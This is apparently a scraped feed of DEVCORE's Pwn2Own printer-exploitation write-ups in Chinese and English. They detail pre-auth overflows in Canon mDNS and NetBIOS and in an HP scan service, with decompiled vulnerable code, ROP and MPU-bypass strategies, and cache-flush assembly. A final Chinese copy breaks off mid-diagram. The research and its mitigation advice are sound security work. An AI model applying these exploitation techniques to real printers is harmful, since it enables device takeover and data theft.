在 HP 印表機中,多了 XN 及 MPU 的記憶體保護措施,另外這個漏洞也有了更多的限制。我們只能 overflow 約 0x100 bytes不能有 null 字元,這大幅限制了我們的 ROP,使得我們沒辦法單靠 ROP 做到後續行動,需要另外找其他的漏洞或其他方法才能達成我們的目標。在一段時間後,我們開始思考,HP 印表機是如何去實作 XN(DEP)MPU的? 我們回顧一下 HP RTOS:

  • 所有 Service code 及 Kernel Code 都在同一個 Binary 中。
  • 大多數的 task 都跑在同一個記憶體空間底下(沒有 Process isolation),也幾乎都跑在高權限模式

看完以上兩點,會想到是不是理解 HP RTOS 中的 MMU 及 MPU 就可以繞過呢?

我們來看一下 HP RTOS MMU 機制

MMU in HP M283fdw

在 HP M283fdw 中使用的是一階層的 Translation table 來做 Address translation ,每個 translation table entry 都表示 1MB 的 Section,而 Translation table 則是固定在 0x4003c000這個位置上

而每個 translation table entry 都會對應到 physical address 及該 section 的權限,CPU 就是根據這些內容決定執行權限、記憶體內容修改權限,如果我們可以修改 translation table entry 的內容就可以更改記憶體權限,也可以透過它來 Mapping 任意 Physical address,這邊跟權限有關的主要會有 AP APX 跟 XN。

我們可以從前述的漏洞中注意到,在有 stack overflow 且也跑在高權限下,就可通過 ROP 修改 translation table entry,但當我們對嘗試直接對 translation table 做寫入後,結果

造成印表機 Crash,查了一下發現是 memory fault exception,主要造成原因就是因為 Memory Protect Unit (MPU) 有對該記憶體區段做保護。

好,那我們就來看看 MPU 的機制。

MPU in HP M283fdw

MPU主要功能是把 memory 拆分成好幾個 region 並定義每個 region 的權限,與 MMU 是完全不同的機制,很常出現在 IoT 設備中。 HP 則是在開機就會啟用,並將每個 region 定義好權限,因此無法自己操作 page table。

在長時間逆向及參考 ARM Manual之後,我們發現事實上只要清空 MPU_CTRL 就可關閉 MPU,在經過逆向後 HP M283fdw 的 MPU_CTRL 位置是在 0xE0400304,這邊稍微跟 ARM 的 spec 有點不同,不太確定原因就是了。

Exploitation

在了解 HP 的 MMU 及 MPU 機制後,我們可輕易地利用 ROP 來關閉 MPU,並成功修改 translation table entry,我們可以任意的修改任何 serivce 的程式碼,這邊我們最後選擇了 Line Printer Daemon(LPD)這個服務來修改,將它修改成後門: 讀入更多的 Payload 到指定的位置上,最終執行我們送過去的 shellcode。

但有一點必須特別注意,覆蓋完 translation table entry 跟 LPD 的 code 後,務必要 flush TLB清掉 I-cache 和 D-cache不然很有可能還是跑在舊有的程式碼上面導致 exploit 失敗。

Flash TLB

flush_tlb:
    mov r12, #0
    mcr p15, 0, r12, c8, c7, 0

Invalidate I-cache

disable_icache:
    mrc p15, 0, r1, c1, c0, 0
    bic r1, r1, #(1 << 12)
    mcr p15, 0, r1, c1, c0, 0

我們重新整理了一下利用步驟

Exploitation Step

  • 首先先觸發 LLMNR 的 stack overflow
  • 利用有限的 ROP 關閉 MPU
  • 利用 ROP 改掉 translation table entry 獲得讀寫執行權限
  • Flush TLB
  • 改掉 LPD service 的程式碼
  • 清掉 I-cache 和 D-cache
  • 使用改過的 LPD 讀我們的 shellcode 後並執行

Pwn2Own Austin 2021

到可以執行 shellcode 時,我們只剩一週時間,我們最後選擇跟 Canon 一樣使用改字串顯示 Pwned by DEVCORE到 LCD 上。

而幸運的是,我們第一次嘗試就成功了:)

在這之後我們也嘗試了直接把後門改成 debug console 上面,方便利用許多功能,例如查看記憶體資訊,播放音樂等等功能,F-Secure Labs在比賽時就使用播放音樂這個功能來呈現,非常有趣,可以到這裡看當時的情況。

Result

在 Pwn2Own Austin 2021 中,我們打下其他設備跟印表機後最終獲得了第二名,以這次來說獲得不錯經驗,也學到了一些新東西。

而對於一般用戶們,有什麼方法可以避免印表機被當作攻擊目標甚至是跳板呢?

Mitigation

Update

首先就是定期更新,上述的印表機都已有 patch,這邊是很常被大家忽略的一部分,我們很常看到印表機好幾年了都沒更新,甚至直接預設密碼放著,很容易就被當成目標。

Disable unused service

另外一點就是盡可能關掉沒在用的服務, 大部分的印表機預設開啟過多平常根本不會用的服務,我們甚至認為可以關掉 discovery 服務,只要開你要用的就好了。

Firewall

更好的做法可以再加上 firewall,大部分印表機也都有提供相關功能。

Summary

事實上,我們獲得 shellcode 執行後,除了印東西在 LCD 外,我們可以藉由印表機來竊取機密資訊,不論是機密文件或是一些 credential,印表機也是個平行移動 (Lateral Movement) 的點,而且很難被偵測到,是紅隊中非常好的目標。另外很多印表機上的發現服務系列的協定或是 DNS 系列的協定很常出問題,如果想找類似印表機或其他 IoT 設備的漏洞,也許可以優先朝這個方向看看。

To be continue

最後,我們在去年 Pwn2Own Toronto 2022中,也在印表機系列中找到幾個漏洞,我們也將會在近期發佈詳細資訊,敬請期待 Part II

Reference

Your printer is not your printer ! - Hacking Printers at Pwn2Own Part II

$
0
0

English Version, 中文版本

Hacking Printers at Pwn2Own Toronto 2022

Based on our previous research, we also discovered Pre-auth RCE vulnerabilities((CVE-2023-0853CVE-2023-0854) in other models of Canon printers. For the HP vulnerability, we had a collision with another team. In this section, we will detail the Canon and HP vulnerabilities we exploited during Pwn2own Toronto.

  • Pwn2Own Toronto 2022 Target
TargetPriceMaster of Pwn Points
HP Collor LaserJet Pro M479fdw$200002
Lexmark MC3224i$200002
Canon imageCLASS MF743Cdw$200002

Analysis

Canon

Firmware Extract

Same as 2021, you can refer to Part I. The current version is v11.04.

HP

The firmware can be obtained from HP’s official website. However, unlike in 2021, it cannot be directly extracted using binwalk. The firmware is encrypted with AES, and it’s hard to decrypt directly from the information.

At first, our thought was to look for the firmware of the same series to see if there was an unencrypted version. However, there was no such firmware on HP’s official website that met our criteria. We initially considered tearing down the printer to dump the firmware, but during our search on Google, we stumbled upon an older mirror site. This site enabled directory listing, allowing us to access all the firmware stored on that mirror website.

However, the problem was that the mirror site only mirrored up to 2016 and didn’t have the latest information. Still, we later managed to glean the official directory structure from the website information, which helped us to obtain an unencrypted firmware from a similar series.”

After our analysis, we found decryption-related information in the Firmware from fwupd. By reverse engineering, we were able to identify the encryption method and the Key. We can use the key to decrypt the target version of the Firmware.

HP Collor LaserJet Pro M479fdw

  • OS - Linux Base
  • ARMv7 32bit little-endian

Vulnerability & Exploitation

Canon

mDNS (CVE-2023-0853)

We found a stack overflow on mDNS. mDNS protocol resolves hostnames to IP address within small networks that do not include a local name server and are usually used for Apple and IoT devices.

It is enabled on Canon ImageCLASS MF743Cdw(Version 11.04) by default.

Before we look at the detail of the vulnerability we need to talk about mDNS Packet Structure.

mDNS is based on the DNS packet format defined in RFC1035 Section 4 for both queries and responses. mDNS queries and responses utilize the DNS header format defined in RFC1035 with exceptions noted below:

The packet format:

    +---------------------+
    |        Header       |
    +---------------------+
    |       Question      | the question for the name server
    +---------------------+
    |        Answer       | RRs answering the question
    +---------------------+
    |      Authority      | RRs pointing toward an authority
    +---------------------+
    |      Additional     | RRs holding additional information
    +---------------------+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The header contains the following fields:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      ID                       |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    QDCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ANCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    NSCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ARCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The answer section contains RRs that answer the question.

Resource record format:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                                               |
    /                                               /
    /                      NAME                     /
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TYPE                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                     CLASS                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TTL                      |
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                   RDLENGTH                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
    /                     RDATA                     /
    /                                               /
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The RDATA section varies depending on the ‘type’. When type=NSEC, its format is as follows:

   The RDATA of the NSEC RR is as shown below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                      Next Domain Name                         /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                       Type Bit Maps                           /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://www.ietf.org/rfc/rfc4034.txt)

More details can reference to RFC6762.

Other element is not important in this vulnerability, so we won’t explain more here. More detail can be found at RFC6762, RFC1035 and RFC4034.

Where is the bug

When Canon ImageCLASS MF743Cdw is parsing the Answer field (type NSEC) in mDNS header, there is a stack overflow.

In the function bnMdnsParseAnswers, it will parse answer section.

int__fastcallbnMdnsParseAnswers(netbios_header*mdns_packet,unsignedint*ppayloadlen,netbios_header*pmdns_header,_WORD*anwser_rr,rrlist**payload,_DWORD*pinfo){...charnsec_buf[256];// ------ fixed size on the stack..._mdns_packet=(int)mdns_packet;p_payloadlen=ppayloadlen;p_mdns_header=pmdns_header;anwser_cnt=anwser_rr;v66=0;cur_ptr=&mdns_packet->payload[*pinfo];v9=*payload;v10=*payload;do{v11=v10==0;if(v10){v9=v10;v10=(rrlist*)v10->c;}else{v6=aBnmdnsparseans;v10=0;v67=0;}}while(!v11);while((unsigned__int16)*anwser_cnt>v67){...if...type=(unsigned__int16)pname->type;if(type==28)gotoLABEL_36;if...if...if(type!=0x21){if(type!=47)// NSEC{...gotoLABEL_95;}v62=0;v63=0;zeromemory(nsec_buf,256,v19,v20);v47=bnMdnsMalloc(8);rrlist->pname->nsec=v47;if(!v47){bnMdnsFreeRRLIST((int)rrlist);v50=2720;LABEL_76:debugprintff(3610,3,"[bnjr] [%s] <%s:%d> bnMdnsParseAnswers error in malloc(NSEC)\n","IMP/mdns/common/tcBnMdnsMsg.c",v6,v50);return3;}maybe_realloc(v47,8);nsec=rrlist->pname->nsec;nsec_len=bnMdnsGetDecodedRRNameLen(cur_ptr,*ppayloadlen,(char*)_mdns_packet,&dwbyte);if...if...v51=(_BYTE*)bnMdnsMalloc(nsec_len);*(_DWORD*)nsec=v51;if...consume_label(cur_ptr,*ppayloadlen,_mdns_packet,v51,nsec_len);v52=dwbyte;v53=&cur_ptr[dwbyte];v54=*ppayloadlen-dwbyte;*ppayloadlen=v54;v55=(unsigned__int8)v53[1];v56=(unsigned__int8)*v53;nsec_=v53+2;*ppayloadlen=v54-2;v57=v56|(v55<<8);nsec_len_=__rev16(v57);if...memcpy((int)nsec_buf,nsec_,nsec_len_,v57);//-------- [1]  stack overflow for(i=0;i<(int)nsec_len_;++i){if(nsec_buf[i]){for(j=0;j<8;++j){if(1<<j==(unsigned__int8)nsec_buf[i]){if(v62)v63=7-j+8*i;elsev62=7-j+8*i;}}}}*(_WORD*)(nsec+4)=v62;...}*pinfo=&cur_ptr[-_mdns_packet-0xC];*anwser_cnt-=v66;return0;}}

When it is parsing the NSEC(type 47) record, it does not check the length of the record. It will copy the data to a local buffer(nsec_buf[256]) at [1], which leads to a stack buffer overflow.

Exploitation

We can construct an mDNS packet to trigger the stack overflow. It does not have Stack Guard, so we can overwrite the return address directly. It also does not implement DEP. We can overwrite the return address with a global buffer which we can control to run our shellcode.

We finally chose BJNP session buffer as our target. It will copy our payload when we start a BJNP session.

We can run shellcode to do anything, such as modifying the website, changing the LCD screen, etc.

NetBIOS (CVE-2023-0854)

We found a heap overflow on NetBIOS. NetBIOS is a protocol for Network Basic Input/Output System. It provides services related to the session layer of the OSI model allowing applications on separate computers to communicate over a local area network. . Canon implemented the NetBIOS daemon by themselves.

It is enabled on Canon ImageCLASS MF743Cdw(Version 11.04) by default.

NetBIOS provides three distinct services:

  • Name service (NetBIOS-NS) for name registration and resolution.
  • Datagram distribution service (NetBIOS-DGM) for connectionless communication.
  • Session service (NetBIOS-SSN) for connection-oriented communication.

We will focus on NetBIOS-NS (port 137).

Before we look at the detail of the vulnerability we need to talk about NetBIOS-NS Packet Structure.

NetBIOS-NS is based on the DNS packet format. It is defined in RFC1002 for both queries and responses. NetBIOS queries and responses utilize the NS header format defined in RFC1002 with exceptions noted below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         NAME_TRN_ID           | OPCODE  |   NM_FLAGS  | RCODE |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          QDCOUNT              |           ANCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          NSCOUNT              |           ARCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

The query will be placed after the header. The first element is QNAME which is a domain name represented as a sequence of labels, where each label consists of a length character followed by that number of characters. Other element is not important in this vulnerability, so we won’t explain more here. More details can be found at RFC1002.

Where is the bug

When Canon ImageCLASS MF743Cdw is parsing the NetBIOS in NetBIOS packets, there is a heap overflow. The vulnerability is in cmNetBiosParseName function. We can trigger it from ndNameProcessExternalMessage.

When NetBIOS service starts, it will initial netbios_ns_buffer. The buffer would be allocated 0xff bytes from the heap.

intndNameInit(){sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED3194,97,0x64u);netbios_ns_buffer=calloc(1,0xFF);...return-1;}

When parsing the NetBIOS-NS in NetBIOS packets, it will use ndNameProcessExternalMessage to process it.

int__fastcallndNameProcessExternalMessage(Adapter*a1){netbios_header*packet;// r0unsigned__int8*v3;// r6intflag;// r0intv5;// r5intv6;// r0intv8;// r4charnbname[40];// [sp+8h] [bp-28h] BYREFsub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED31AC,178,0x64u);packet=(netbios_header*)a1->packet;LOWORD(a1->vvv)=LOBYTE(packet->id)|(HIBYTE(packet->id)<<8);v3=cmNetBiosParseName(packet,(unsigned__int8*)packet->payload,(int)nbname,netbios_ns_buffer,0xFFu);//---- [1]//heap overflow at netbios_ns_buffer  if...flag=getname_query_flag((netbios_header*)a1->packet);v5=flag;if(flag==0xA800){v6=ndInternalNamePositiveRegistration(a1,(int)nbname,(int)v3);gotoLABEL_17;}if(flag>0xA800){switch(flag){case0xA801:v6=ndInternalNameNegativeRegistration(a1,(int)nbname);gotoLABEL_17;...}gotoLABEL_14;}...ndInternalNameNegativeQuery((int)a1,(int)nbname);v6=ndExternalNameNegativeQuery((int)a1,nbname);LABEL_17:v8=v6;assset("netcifsnqendapp/IMP/nq/ndnampro.c",0x44ED31AC,238,100);returnv8;}

At [1], the function cmNetBiosParseName does not calculate the length of the domain name correctly. It will copy the domain name to netbios_ns_buff, which leads to a heap overflow.

Let’s take a look at cmNetBiosParseName function.

unsigned__int8*__fastcallcmNetBiosParseName(netbios_header*netbios_packet,unsigned__int8*netbios_label,intnetbios_name,_BYTE*domain_name,unsignedintmaxlen){charv5;// r9unsigned__int8*v11;// r0_BYTE*v12;// r1unsignedinti;// r0charv15;// r3charv16;// r2intv17;// r0unsigned__int8*v18;// r0unsignedintv19;// r3char*label_;// r0unsignedintlabellen_;// r4unsignedintlabellen;// t1char*v23;// r5unsigned__int8*next[9];// [sp+4h] [bp-24h] BYREF...if(*v11==0x20){...v17=*next[0];if(*next[0])v5='.';else*domain_name=0;if(v17){do{v18=resolveLabel(netbios_packet,next);labellen=*v18;label_=(char*)(v18+1);labellen_=labellen;if(maxlen>labellen){memcpy((int)domain_name,label_,labellen_,v19);v23=&domain_name[labellen_];maxlan-=labellen_;// ---------- [2]              // it does not subtract the length of "."*v23=v5;domain_name=v23+1;}}while(*next[0]);*(domain_name-1)=0;}assset("netcifsnqecorelib/IMP/nq/cmnbname.c",0x44A86D7C,634,100);returnnext[0]+1;}else{logg("netcifsnqecorelib/IMP/nq/cmnbname.c",0x44A86D7C,595,10);return0;}}

The function cmNetBiosParseName will parse the domain from the label in the NetBIOS packet to the domain_name buffer and it has a verification. The verification will check that the total length of the label could not larger than maxlen, and a "." will be added between each label. But it does not subtract the length of "." characters so that the total length of the label can be larger than maxlen. It will lead to overflow.

Exploitation

Luckily, there is a useful structure nb_info to achieve our goal. We can use the heap overflow to overwrite the structure of nb_info.

The layout of heap memory:

The structure of nb_info and Adapter:

structnb_info{intactive;charnbname[16];intx;inty;shortz;shortsrc_port;shorttid;shortw;Adapter*adapter;char*ptr;intstate;...}

The structure is used to store NetBIOS name information, it also has a member Adapter to store the information of connection.

structAdapter{intidx;_BYTEgap0[16];intx;intfd_1022;intfd_1023;inty;_WORDsrc_port;_DWORDsrc_ip;intvvv;intpacket;_DWORDrecv_bytes;char*response_buf;_DWORDdword3C;};

Let’s back to ndNameProcessExternalMessage, if the flag of NetBIOS-NS packet is set to 0xA801, it will use ndInternalNameNegativeRegistration to process our NetBIOS name. The result will be written to Adapter->responsebuf.

case0xA801:v6=ndInternalNameNegativeRegistration(a1,(int)nbname);gotoLABEL_17;

At ndInternalNameNegativeRegistration :

int__fastcallndInternalNameNegativeRegistration(Adapter*adapter,inta2){...if(v8){returnNegativeRegistrationResponse((nb_info*)v6,adapter,3);}...}

If the conditions are met, it will use ‘returnNegativeRegistrationResponse’ to handle the Response.

int__fastcallreturnNegativeRegistrationResponse(nb_info*nbinfo,Adapter*adapter,inta3){intv6;// r2netbios_header*response_buf;// r5intNameWhateverResponse;// r2unsigned__int8v10[20];// [sp+4h] [bp-2Ch] BYREF__int16v11;// [sp+18h] [bp-18h] BYREFintv12;// [sp+1Ah] [bp-16h] BYREFmaybe_memcpy_s(v10,0x44ED3100,20);sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2349,0x64u);if...v11=0;sub_40B06FD8(*(_DWORD*)adapter->gap0,&v12);response_buf=*(netbios_header**)nbinfo->adapter->responsebuf;NameWhateverResponse=ndGenerateNameWhateverResponse(response_buf,nbinfo->name,0x20u,(char*)&v11,6u);if(NameWhateverResponse>0){response_buf->id=nbinfo->id;//------[3]response_buf->flag=__rev16(a3|0xA800);if(sySendToSocket(nbinfo->adapter->fd_1022,(constchar*)response_buf,NameWhateverResponse,v10,(unsigned__int16)nbinfo->src_port)<=0){logg("netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2392,10);v6=2393;}else{v6=2396;}gotoLABEL_9;}assset("netcifsnqendapp/IMP/nq/ndinname.c",0x44ED30DC,2372,100);return-1;}

In [3], it will overwrite response_buf->id with nbinfo->id.

That is, if we can overwrite the nb_info structure and forge the structure of the Adapter, we can do arbitrary memory writing. We need to find a global buffer to forge the structure. We finally chose BJNP session buffer as our target. It will copy our payload when we start a BJNP session.

After we have arbitrary memory writing. We can overwrite the function pointer of SLP service with BJNP session buffer pointer.

int__fastcallsub_4159CF90(unsigned__int8*a1,unsignedinta2,inta3,int*a4){...result=((int(__fastcall*)(int*,char*))dword_45C8FF14[2*v20])(&v38,v47);// SLP functionif(!result)gotoLABEL_46;}returnresult;}

It does not implement DEP. After overwriting the function pointer, we can use the BJNP session buffer again to put our shellcode. After that, we can use the SLP attribute request to control the PC and run our shellcode.

HP

Our target this time is the HP Color LaserJet Pro M479fdw printer, which is primarily Linux-based. This makes the analysis relatively simpler. Under the Web Service, there are numerous ‘cgi’ files providing various printer operations. These operate via the FastCGI method. You can refer to the nginx config to see which path corresponds to which port and service. The config can be found at rootfs/sirius/rom/httpmgr_nginx.

/Sirius/rom/httpmgr_nginx/ledm.conf

Where is the bug

/usr/bin/local/slanapp is responsible for handling scan-related operations and primarily listens on 127.0.0.1:14030.

We can see from rootfs/sirius/rom/httpmgr_nginx/rest_scan.conf :

If we access /Scan/Jobs, the request is forwarded to a FastCGI listening on the 14030 port. After analysis, we found that it was handled by /rootfs/usr/local/bin/slangapp. When we send a request to /Scan/Jobs, it will call scan_job_http_handler in slangapp.

Where is the bug

There is a stack overflow at rest_scan_handle_get_request in slangapp.

int__fastcallscan_job_http_handler(inta1){...intrequest_method;// [sp+14h] [bp-2Ch]char*host;// [sp+18h] [bp-28h] BYREFintport;// [sp+20h] [bp-20h] BYREFchar*uri;// [sp+28h] [bp-18h] BYREFintpathinfo;// [sp+30h] [bp-10h] BYREFinturilen[2];// [sp+38h] [bp-8h] BYREFintpathinfo_len;// [sp+40h] [bp+0h] BYREFchars[132];// [sp+44h] [bp+4h] BYREFchardest[260];// [sp+C8h] [bp+88h] BYREFhost=0;memset(s,0,0x81u);port=-1;uri=0;pathinfo=0;urilen[0]=0;pathinfo_len=0;memset(byte_5DBD0,0,0x9C4u);v2=((int(__fastcall*)(structhttpmgr_fptrtbl**,int))(*rest_scan_req_ifc_tbl)->acceptRequestHelper)(rest_scan_req_ifc_tbl,a1);if...if(((int(__fastcall*)(structhttpmgr_fptrtbl**,int,char**,int*,int*,int*,_DWORD,_DWORD))(*rest_scan_req_ifc_tbl)->getURI)(rest_scan_req_ifc_tbl,a1,&uri,urilen,&pathinfo,&pathinfo_len,0,0)<0)_DEBUG_syslog((int)"REST_SCAN_DEBUG",0,1193517589,0,0);if...v17=1;if...LABEL_7:request_method=((int(__fastcall*)(structhttpmgr_fptrtbl**,int))(*rest_scan_req_ifc_tbl)->getVerb)(rest_scan_req_ifc_tbl,a1);if...v3=((int(__fastcall*)(structhttpmgr_fptrtbl**,int))(*rest_scan_req_ifc_tbl)->getContentLength)(rest_scan_req_ifc_tbl,a1);v4=v3;if((unsignedint)(v3-1)<=0x9C2){v14=v3;v15=0;do{if(v14>=2500)v14=2500;v16=((int(__fastcall*)(structhttpmgr_fptrtbl**,int,char*,int))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl,v2,&byte_5DBD0[v15],v14);if(v16<=0)break;v15+=v16;v14=v4-v15;}while(v4-v15>0);*((_BYTE*)&dword_5DBC8+v4+8)=0;if(v15<0){v17=1;_DEBUG_syslog((int)"REST_SCAN_DEBUG",0,0x475DA215,v15,a1);}}elseif(v3>0x9C3){v5=0;do{while(2500-v5>0){v6=((int(__fastcall*)(structhttpmgr_fptrtbl**))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl);if(v6<=0)break;v5+=v6;}v7=v5<=0;v5=0;}while(!v7);}v8=((int(__fastcall*)(structhttpmgr_fptrtbl**,int,char**,int*))(*rest_scan_req_ifc_tbl)->getHost)(rest_scan_req_ifc_tbl,a1,&host,&port);if...v9=((int(__fastcall*)(structhttpmgr_fptrtbl**,int))(*rest_scan_req_ifc_tbl)->completeRequestHelper)(rest_scan_req_ifc_tbl,a1);if(v9>0){do{v10=0;do{while(2500-v10>0){v11=((int(__fastcall*)(structhttpmgr_fptrtbl**))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl);if(v11<=0)break;v10+=v11;}v7=v10<=0;v10=0;}while(!v7);v12=((int(__fastcall*)(structhttpmgr_fptrtbl**,int))(*rest_scan_req_ifc_tbl)->completeRequestHelper)(rest_scan_req_ifc_tbl,a1);}while(v12>0);v9=v12;}...result=(*(int(__fastcall**)(int))(*(_DWORD*)dword_65260+20))(dword_65260);dword_594F0=result;switch(request_method){case1:result=rest_scan_handle_get_request(a1,v4,uri,(unsigned__int8*)pathinfo,pathinfo_len);// ----- [1]break;...default:returnresult;}returnresult;

If the request method is GET, it will use rest_scan_handle_get_request at [1] to handle it. It also passes the pathinfo to this function.

int__fastcallrest_scan_handle_get_request(inta1,inta2,char*s1,unsigned__int8*pathinfo,intpathinfo_len){structhttpmgr_fptrtbl**v8;// r0intv9;// r1intv10;// r2structhttpmgr_fptrtbl**v11;// r0intv12;// r1intresult;// r0intv14;// r0intnext_char;// r4unsigned__int8*v16;// r3intv17;// r1intv18;// t1char*v19;// r5intv20;// r5intv21;// r0intv22;// r7size_tv23;// r8intv24;// r0charfirst_path_info[32];// [sp+8h] [bp-D8h] BYREFcharsecond_path_info[32];// [sp+28h] [bp-B8h] BYREFcharpagenumber[152];// [sp+48h] [bp-98h] BYREFif...if...if(!strncmp(s1,"/Scan/UserReadyToScan",0x15u)){...}else{v14=strncmp(s1,"/Scan/Jobs",0xAu);if(v14){...}...next_char=*pathinfo;if((next_char&0xDF)==0){first_path_info[0]=0;LABEL_37:_DEBUG_syslog("REST_SCAN_DEBUG",0,0x411FA215,400,0);v8=rest_scan_req_ifc_tbl;v9=a1;v10=400;gotoLABEL_6;}v16=pathinfo;v17=0;do//------------------------------------------------------ [2]  {if(next_char!='/')first_path_info[32*v17+v14]=next_char;v19=&first_path_info[32*v17];if(next_char=='/'){v20=32*v17++;pagenumber[v20-64+v14]=0;v19=&first_path_info[v20+32];v14=0;}else{++v14;}v18=*++v16;next_char=v18;}while((v18&0xDF)!=0);v19[v14]=0;if(v17!=2||strcmp(second_path_info,"Pages")||dword_5DBC8!=strtol(first_path_info,0,10))gotoLABEL_37;v24=strtol(pagenumber,0,10);result=rest_scan_send_scan_data(a1,v24)+1;if(result)rest_scan_vp_thread_created=1;elsereturnrest_scan_send_err_reply(a1,400);}returnresult;}

But when it parse the pathinfo at [2], it does not check the length of pathinfo. Then copy the pathinfo to the local buffer(first_path_info[32]), which leads to a stack overflow.

Exploitation

We can construct the request to /Scan/Jobs/ to trigger it. It does not have Stack Guard, so we can overwrite the return address directly. But it has DEP, we need to do ROP to achieve our goal. Finally, we use ROP to overwrite the GOT of strncmp. After overwriting it, we can execute arbitrary commands when we access /Copy/{cmd}

However, in the end, this vulnerability collided with another team’s discovery.

Summary

Based on the results from Pwn2Own Austin 2021 to Pwn2Own Toronto 2022, printer security remains an easily overlooked issue. In just one year, the number of teams capable of compromising printers has significantly increased. Even in the third year, at Pwn2Own Toronto 2023, many teams still found vulnerabilities. It is recommended for everyone using these IoT devices to turn off unnecessary services, set up firewalls properly, and ensure appropriate access controls to reduce the risk of attacks.


Your printer is not your printer ! - Hacking Printers at Pwn2Own Part II

$
0
0

English Version, 中文版本

Hacking Printers at Pwn2Own Toronto 2022

延續之前的研究,去年我們也在 Canon 的其他型號中,找到了 Pre-auth RCE 漏洞 (CVE-2023-0853CVE-2023-0854),同時 HP 的印表機也有找到 Pre-auth RCE 的漏洞,然而最終與其他隊伍撞洞。我們將在本文講述我們在 Pwn2own Toronto 中所使用的 Canon 及 HP 漏洞的細節,以及我們的利用方式。

  • Pwn2Own Toronto 2022 Target
TargetPriceMaster of Pwn Points
HP Collor LaserJet Pro M479fdw$200002
Lexmark MC3224i$200002
Canon imageCLASS MF743Cdw$200002

Analysis

Canon

Firmware Extract

與 2021 年相同,可參考前述部分,本次版本為 v11.04 。

HP

Firmware 本身可以從 HP 的 Firmware 網站中取得,但與 2021 年不同,並無法直接用 binwalk 解出,這邊的 Firmware 是透過 AES 加密的,從現有的資訊中不太好直接解開。

而這邊起初想法是找相同系列的 Fimware 看看是否有未加密版本,然而 HP 官方的 Firmware 中,並沒有符合條件的 Firmware,原本打算拆印表機想辦法 Dump firmware,但我們後來在 Google 的過程中,找到了舊版的 mirror 站,而該網站有開 index of,我們可以從中獲得所有在 mirror 網站中的 Firmware。

但這邊問題是該 Mirror 網站只有 mirror 到 2016 並沒有最新版本的資訊,不過後來可以從網站資訊中,獲得官方的目錄結構,從而取得相同系列的但沒有加密的 Firmware。

在分析過後,我們從 Firmware 中找到 fwupd 中有解密相關資訊,透過逆向可以知道加密方法及 Key,進而解出目標版本的 Firmware。

HP Collor LaserJet Pro M479fdw

  • OS - Linux Base
  • ARMv7 32bit little-endian

Vulnerability & Exploitation

Canon

mDNS (CVE-2023-0853)

mDNS 協定主要提供了區網中的域名解析功能,並且不需要有 Name Server 的介入,常用於 Apple 及 IoT 設備中。

而在 Canon 中,預設情況下,也提供了相同的功能,方便使用者尋找區網中的印表機。

該協定主要以 DNS 為基礎,基本上 mDNS 也大多建立在 DNS 封包格式 (RFC1035)上,格式如下:

The packet format:

    +---------------------+
    |        Header       |
    +---------------------+
    |       Question      | the question for the name server
    +---------------------+
    |        Answer       | RRs answering the question
    +---------------------+
    |      Authority      | RRs pointing toward an authority
    +---------------------+
    |      Additional     | RRs holding additional information
    +---------------------+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The header contains the following fields:

                                    1  1  1  1  1  1
